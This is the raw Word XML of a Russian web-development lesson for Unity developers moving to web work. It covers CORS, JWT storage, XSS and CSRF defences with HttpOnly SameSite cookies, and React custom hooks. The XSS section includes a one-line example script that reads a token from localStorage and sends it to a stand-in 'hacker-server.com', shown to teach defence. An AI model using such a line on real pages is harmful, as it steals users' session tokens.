          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (app.MapControllers): Выполнение бизнес-логики.</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порядок гарантирует, что "рукопожатие" CORS завершится успешно до того, как сервер начнет требовать учетные данные.</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Инженерия Безопасности Идентичности: JWT и Угрозы Веба</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разработке игр на Unity (особенно синглплеер) хранение сессии часто реализуется через PlayerPrefs или локальные файлы. Модель угроз здесь проста: мы защищаемся от пользователя, который хочет "взломать" свои сохранения. В вебе модель угроз кардинально иная: мы защищаем пользователя от </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">других</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> сайтов и скриптов, которые хотят украсть его личность (Identity Theft).</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Ловушка LocalStorage и XSS Уязвимости</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Самый простой способ сохранить JWT токен в React — записать его в localStorage. Это прямой аналог PlayerPrefs.SetString("token", jwt).</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localStorage.setItem('token', jwt).</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Угроза (XSS - Cross-Site Scripting):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LocalStorage доступен </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">любому</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript коду, выполняемому на странице. Если ваше приложение подвержено XSS-атаке (например, вы отображаете комментарии пользователей без санитайзинга, или используете уязвимую npm-библиотеку), злоумышленник может внедрить скрипт.</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Вектор атаки:</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Вредоносный скрипт</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token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localStorage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.getItem(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'token'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fetch(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'https://hacker-server.com/steal'</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body</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: token });</w:t>
        <w:br w:type="textWrapping"/>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Последствие:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хакер получает полный доступ к аккаунту пользователя. В отличие от игр, где взлом влияет только на локальный прогресс, здесь речь идет о доступе к личным данным.</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Решение: HttpOnly Cookies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защититься от кражи токена через XSS, необходимо сделать токен недоступным для JavaScript. Для этого используются </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly Cookies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Сервер отправляет токен не в теле ответа, а в заголовке Set-Cookie с флагом HttpOnly.</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Безопасность:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Браузер сохраняет эту куку в защищенной области памяти. Свойство document.cookie в JS не покажет этот токен. Даже если на странице сработает вредоносный скрипт, он не сможет прочитать куку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Транспорт:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Браузер автоматически прикрепляет эту куку к каждому запросу на тот же домен. Это работает на уровне сетевого стека браузера, прозрачно для React-кода.</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CSRF: Атака Подделки Запроса и Защита</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кук решает проблему XSS, но открывает вектор </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поскольку браузер </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">автоматически</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> отправляет куки, злоумышленник может создать сайт-ловушку.</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Сценарий атаки:</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Пользователь залогинен в вашем приложении (myapp.com), кука сессии установлена.</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Пользователь переходит на evil-site.com.</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 evil-site.com есть скрытая форма или скрипт, отправляющий POST запрос на myapp.com/api/delete-account.</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Браузер видит запрос к myapp.com, автоматически прикрепляет к нему auth-куку и отправляет.</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Сервер видит валидную куку и выполняет удаление аккаунта. Пользователь не совершал этого действия осознанно.</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Защита: Атрибут SameSite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Современным стандартом защиты является атрибут SameSite у куки.</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SameSite=Strict: Кука отправляется </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> если запрос исходит с того же сайта, который установил куку. Это полностью блокирует CSRF, но может мешать при переходе по внешним ссылкам.</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SameSite=Lax: Кука не отправляется при кросс-доменных подзапросах (картинки, фреймы, AJAX POST), но отправляется при навигации верхнего уровня (когда пользователь кликает ссылку). Это разумный компромисс для большинства приложений.</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Рекомендация:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для интеграции React и.NET API следует использовать </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly Cookies с SameSite=Strict</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это обеспечивает эшелонированную защиту: токен невидим для скриптов (защита от XSS) и не отправляется с чужих сайтов (защита от CSRF).</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Архитектурные Паттерны: React Hooks как Сервисный Слой</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мы часто используем паттерн </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Singleton</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GameManager.Instance) или </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Locator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> для доступа к глобальным сервисам. Это удобно, но создает жесткую связность и проблемы с тестированием. В React синглтоны являются анти-паттерном, так как они выпадают из реактивного цикла обновлений UI. Вместо них мы используем </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Hooks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Деконструкция Синглтона</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менеджер часто выглядит так:</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EventManager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MonoBehaviour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EventManager Instance;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List&lt;EventData&gt; Events;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Refresh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Использование</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data = EventManager.Instance.Events;</w:t>
        <w:br w:type="textWrapp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React состояние должно быть локальным или передаваться через Context. Custom Hook (useEvents) выступает в роли фабрики, предоставляющей доступ к логике и состоянию.</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Паттерн "Хук как Репозиторий"</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Мы можем спроектировать "Сервисный Слой" на основе хуков, который инкапсулирует сложность fetch, AbortController, обработки ошибок и состояния загрузки. Это полный аналог класса-сервиса в DDD (Domain Driven Design), но адаптированный под функциональную природу React.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Пример реализации: useEvents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хук скрывает детали HTTP-взаимодействия и предоставляет компоненту чистый API данных.</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src/features/calendar/hooks/useEvents.js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useState, useEffect, useCallback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apiClient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'../api/client'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Обертка над fetch/axios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useEvents =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(dateRange)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Локальное состояние сервиса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[events, setEvents] = useState();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[isLoading, setIsLoading]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[error, setError]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useCallback гарантирует стабильность ссылки на функцию</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fetchEvents = useCallback(</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 =&gt;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controller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AbortController();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Токен отмены</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        setIsLoading(</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setError(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Вызов API с передачей сигнала отмены</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data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apiClient.get(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'/events'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params</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: dateRange,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signal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: controller.signal</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            });</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            setEvents(data);</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f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (err)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Игнорируем ошибку отмены, обрабатываем остальные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(err.name!==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'AbortError'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setError(err.message);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            }</w:t>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Гарантированное сброс флага загрузки (если не отменено)</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(!controller.signal.aborted) {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                setIsLoading(</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Функция очистки для useEffect (аналог OnDisable)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controller.abort();</w:t>
        <w:br w:type="textWrapping"/>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Реактивная зависимость: при смене даты функция пересоздается</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Эффект автоматически запускает загрузку при изменении зависимости</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    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cancel = fetchEvents();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cancel;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React вызывает это при размонтировании</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    }, [fetchEvents]);</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Возвращаем "Контракт" сервиса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 events, isLoading, error,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refetch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: fetchEvents };</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">};</w:t>
        <w:br w:type="textWrapping"/>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Сравнительная Архитектура: Реактивный Поток Данных</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подход демонстрирует сдвиг от архитектуры "Pull" (вытягивание) к "Push/Reactive" (реактивность).</w:t>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 (Pull):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UI компонент в Update() опрашивает менеджер: text.text = Manager.Score.ToString(). Или подписывается на C# Event OnChange.</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 (Reactive):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Компонент декларирует зависимость от хука useEvents. Когда меняется аргумент dateRange (состояние), хук </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">автоматически</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> перезапускается, выполняет запрос, обновляет стейт и заставляет компонент перерисоваться. UI является чистой функцией от состояния хука. Это исключает рассинхронизацию данных, свойственную ручному обновлению UI в Unity.</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Интеграция Unity-разработчика в Fullstack-среду — это упражнение в смене ограничений. В Unity вы ограничены бюджетом времени кадра (16мс) и сборщиком мусора. В React вы ограничены сетевой задержкой, песочницей безопасности браузера (CORS/SOP) и асинхронной природой DOM.</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того, что </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Event Loop</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это приоритезированная очередь задач, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preflight</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это вежливое рукопожатие перед входом, а </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly Cookies</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это защищенное хранилище ключей, позволяет разработчику перенести свой опыт построения надежных систем в новую среду. Использование архитектуры </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Hooks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечивает структурную строгость, аналогичную сервисным паттернам Unity, при этом полностью соответствуя реактивной парадигме современного веба. Эти знания формируют базу для создания безопасных, масштабируемых и производительных приложений корпоративного уровня.</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Интенсив React для Backend Разработчика неделя 10</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Cross-Origin Resource Sharing (CORS) - HTTP - MDN Web Docs,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https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS</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Web Token for Java - OWASP Cheat Sheet Series,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https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html</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C# "event loop" compare to the JavaScript "event loop"? - Stack Overflow,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https://stackoverflow.com/questions/34710487/how-does-the-c-sharp-event-loop-compare-to-the-javascript-event-loop</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ThreadPool Class (System.Threading) - Microsoft Learn,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https://learn.microsoft.com/en-us/dotnet/api/system.threading.threadpool?view=net-10.0</w:t>
        </w:r>
      </w:hyperlink>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system overview - Unity - Manual,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https://docs.unity3d.com/6000.2/Documentation/Manual/job-system-overview.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Multi-Threaded Web Request In Unity Using UnityWebRequest And UnityWebRequestAsyncOperation - slidefactory,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https://www.theslidefactory.com/post/multi-threaded-web-request-in-unity-using-unitywebrequest-and-unitywebrequestasyncoperation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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event loop in Javascript executing in a separate thread? - Stack Overflow,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https://stackoverflow.com/questions/31956007/is-the-event-loop-in-javascript-executing-in-a-separate-thread</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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JavaScript's Single Thread and Event Loop - DEV Community,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https://dev.to/fernandakipper/a-beginners-guide-to-javascripts-single-thread-and-event-loop-1a9h</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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JavaScript Event Loop: A Deep Dive | by Aditya Rajbhar | Medium,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https://medium.com/@codebyaadi/understanding-the-javascript-event-loop-a-deep-dive-7702b8da1e9b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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JavaScript Runtime Environment: Web API, Task Queue, and Event Loop,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https://blazity.com/blog/demystifying-javascript-runtime-environment-web-api-task-queue-event-loop</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Event Loop IN Javascript: A Beginner Guide - F22 Labs,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https://www.f22labs.com/blogs/what-is-an-event-loop-in-javascript-a-beginner-guide/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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microtask and macrotask within an event loop context - Stack Overflow,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https://stackoverflow.com/questions/25915634/difference-between-microtask-and-macrotask-within-an-event-loop-context</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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microtasks in JavaScript with queueMicrotask() - Web APIs | MDN,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https://developer.mozilla.org/en-US/docs/Web/API/HTML_DOM_API/Microtask_guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
